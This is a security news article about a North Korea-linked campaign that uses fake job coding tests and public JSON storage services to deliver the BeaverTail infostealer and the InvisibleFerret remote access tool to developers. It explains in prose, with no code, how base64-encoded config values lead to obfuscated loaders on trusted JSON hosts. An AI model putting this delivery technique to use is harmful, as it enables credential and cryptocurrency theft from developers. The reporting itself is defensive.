A threat campaign associated with North Korean cyber operators has significantly expanded its capabilities by using public JSON storage services as covert malware hosts. Security researchers report that the long-running operation, known as Contagious Interview, now relies on platforms such as JSON Keeper, JSON Silo and npoint.io to store and distribute malicious code during fake job test scenarios. This marks one of the most technically advanced iterations of the campaign, which continues to target developers, blockchain engineers and Web3 professionals across the globe.
The attack begins with a convincing recruiter outreach that invites the victim to participate in a skills assessment or coding test. The victim receives a compressed archive or Git repository containing what appears to be legitimate source code. Embedded within the project are configuration values disguised as environment variables or helper scripts. When decoded, these values point to JSON hosted on public services. Inside those JSON files is obfuscated JavaScript that serves as the primary malware loader.
Once the victim executes the project within a Node.js environment, the loader retrieves and runs the first stage infostealer known as BeaverTail. This malware is designed to capture extensive system information, browser credentials, session data, cryptocurrency wallet details and high-value local documents.
It also takes system screenshots and checks for security tools. After the reconnaissance phase, the malware deploys a second stage component called InvisibleFerret, which functions as a modular remote access tool capable of downloading additional payloads, running commands and maintaining persistent access across Windows, Linux and macOS systems.
The use of public JSON storage significantly complicates detection. Security tools often classify JSON endpoints from popular public services as benign, allowing the attackers to blend their infrastructure into normal developer traffic.
Developers regularly pull JSON-based configurations from such platforms, making the malicious traffic appear completely legitimate. Some of the attack samples include configuration files hidden within nested directories named as .config or server variables, with base64 encoded strings that decode into URLs for JSON-based malware loaders. Because these files mimic the structure of real development environments, investigators warn that many victims may never suspect anything unusual.
This technique represents an escalation in North Korea’s cyber activity. Historically, operators linked to the DPRK relied on phishing documents, infected installers or trojanized blockchain tools. By shifting toward supply-chain style delivery through developer workflows, the attackers gain a more reliable foothold with less exposure. Security researchers note that the threat actors are deliberately targeting individuals with access to digital assets, source repositories or infrastructure credentials, suggesting both espionage and financial motivations. With crypto theft remaining a key revenue stream for North Korea, this campaign aligns with past activity attributed to groups such as Lazarus and Kimsuky.
Researchers describe this attack as one of the clearest examples of how modern developer workflows can be weaponized.